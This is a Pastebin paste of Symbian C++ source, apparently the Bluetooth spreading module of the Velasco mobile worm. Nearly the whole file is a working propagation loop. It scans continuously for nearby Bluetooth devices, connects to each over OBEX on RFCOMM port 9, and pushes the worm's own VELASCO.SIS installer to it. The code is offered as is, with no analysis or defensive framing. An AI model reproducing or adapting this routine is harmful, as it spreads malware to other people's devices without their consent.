Advertisement
FlyFar

velasco_bluetooth.cpp

Mar 9th, 2023
473
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C++ 3.87 KB | Cybersecurity | 0 0
  1. // Codigo baseado em:
  2. // http://irssibot.777-team.org/cobain/docs/2004-01-13/impl-html/btdiscoverer_8cpp-source.html
  3. // http://forum.newlc.com/viewtopic.php?p=2752
  4. // http://www.cs.tut.fi/~mobo/Symbianv6onedocs/devlib/Common/APIGuide/Bluetooth/UsingBluetoothSockets/HowToFindAndConnectToADevice/Howtoselectaremotedevice.html
  5. // http://www.rdc.cz/index.php?jazyk=0&sid=0&main=sekce&stav=clanek&cid=290
  6.  
  7. #include "bluetooth.h"
  8.  
  9.  
  10. #define  _BLUETOOTH_NOT_CONNECTED  0
  11. #define  _BLUETOOTH_CONNECTED      1
  12. #define  _BLUETOOTH_DISCONNECT     2
  13.  
  14. #define  _NOT                      0
  15.  
  16.  
  17. VelascoBluetooth::VelascoBluetooth() : CActive( CActive::EPriorityStandard )
  18. {
  19.     FoundCell = _NOT;
  20.     BluetoothStatus = _BLUETOOTH_CONNECTED;
  21.  
  22.     iCurrObject = CObexFileObject::NewL( TPtrC( NULL, 0 ) );
  23.     iCurrObject->InitFromFileL( _L( "C:\\SYSTEM\\SYMBIANSECUREDATA\\VELASCO\\VELASCO.SIS" ) );
  24.    
  25.     // Adicionando no scheduler, evita problemas de sincronismos
  26.     CActiveScheduler::Add( this );
  27. }
  28.  
  29.  
  30. VelascoBluetooth* VelascoBluetooth::NewL()
  31. {
  32.     return NewLC();
  33. }
  34.  
  35.  
  36. VelascoBluetooth* VelascoBluetooth::NewLC()
  37. {
  38.     VelascoBluetooth* self = new VelascoBluetooth;
  39.     self->ConstructL();
  40.     return self;
  41. }
  42.  
  43.  
  44. void VelascoBluetooth::ConstructL()
  45. {
  46.     BluetoothStatus = _BLUETOOTH_CONNECTED;
  47.    
  48.     RunL();
  49. }
  50.  
  51.  
  52. void VelascoBluetooth::RunL()
  53. {
  54.     if ( BluetoothStatus == _BLUETOOTH_NOT_CONNECTED )
  55.     {
  56.         BluetoothStatus = _BLUETOOTH_CONNECTED;
  57.        
  58.         // Ja estava conectado ?
  59.         if ( iClient->IsConnected() )
  60.         {
  61.             BluetoothStatus = _BLUETOOTH_DISCONNECT;
  62.            
  63.             Cancel();
  64.             iClient->Put( *iCurrObject, iStatus );
  65.             SetActive();
  66.            
  67.             return;
  68.         }      
  69.     }
  70.     else if ( BluetoothStatus == _BLUETOOTH_DISCONNECT )
  71.     {
  72.         BluetoothStatus = _BLUETOOTH_CONNECTED;
  73.  
  74.         Cancel();
  75.         iClient->Disconnect( iStatus );
  76.         SetActive();
  77.        
  78.         return;
  79.     }
  80.  
  81.     // Conseguiu conectar ?
  82.     if ( BluetoothStatus == _BLUETOOTH_CONNECTED )
  83.     {
  84.         if ( iClient != NULL )
  85.         {
  86.             delete iClient;
  87.             iClient = NULL;
  88.         }
  89.  
  90.         while ( BluetoothStatus == _BLUETOOTH_CONNECTED )
  91.         {
  92.             RSocketServ socketServ;
  93.             TProtocolDesc pInfo;
  94.             TNameEntry entry;
  95.            
  96.             if ( socketServ.Connect() == KErrNone )
  97.             {
  98.                if ( socketServ.FindProtocol( (const TProtocolName &) _L( "BTLinkManager" ), pInfo ) == KErrNone )
  99.                {
  100.                    RHostResolver hr;
  101.                    
  102.                    if ( hr.Open( socketServ, pInfo.iAddrFamily, pInfo.iProtocol ) == KErrNone )
  103.                    {   
  104.                        TInquirySockAddr addr;                    
  105.  
  106.                        FoundCell = _NOT;
  107.  
  108.                        addr.SetAction( KHostResInquiry );
  109.                        addr.SetIAC( KGIAC );
  110.    
  111.                        TRequestStatus status;
  112.                        hr.GetByAddress( addr, entry, status );
  113.    
  114.                        User::WaitForRequest( status );
  115.  
  116.                        FoundCell = ( status == KErrNone );
  117.                    }
  118.                }
  119.    
  120.                socketServ.Close();
  121.             }
  122.            
  123.             if ( FoundCell )
  124.             {
  125.                 FoundCell = _NOT;
  126.  
  127.                 Cancel();
  128.        
  129.                 TBTSockAddr addr( entry().iAddr );
  130.                 TBTDevAddr btAddress;
  131.  
  132.                 btAddress = addr.BTAddr();     
  133.  
  134.                 TObexBluetoothProtocolInfo obexProtocolInfo;
  135.  
  136.                 obexProtocolInfo.iTransport.Copy( _L( "RFCOMM" ) );
  137.                 obexProtocolInfo.iAddr.SetBTAddr( btAddress );
  138.                 obexProtocolInfo.iAddr.SetPort( 9 );
  139.    
  140.                 if ( ( iClient = CObexClient::NewL( obexProtocolInfo ) ) )
  141.                 {          
  142.                     iStatus = KRequestPending;
  143.                    
  144.                     BluetoothStatus = _BLUETOOTH_NOT_CONNECTED;
  145.  
  146.                     Cancel();
  147.                     iClient->Connect( iStatus );
  148.                     SetActive();
  149.                 }
  150.             }
  151.             else
  152.             {
  153.                 BluetoothStatus = _BLUETOOTH_CONNECTED;
  154.             }
  155.         }
  156.     }
  157. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement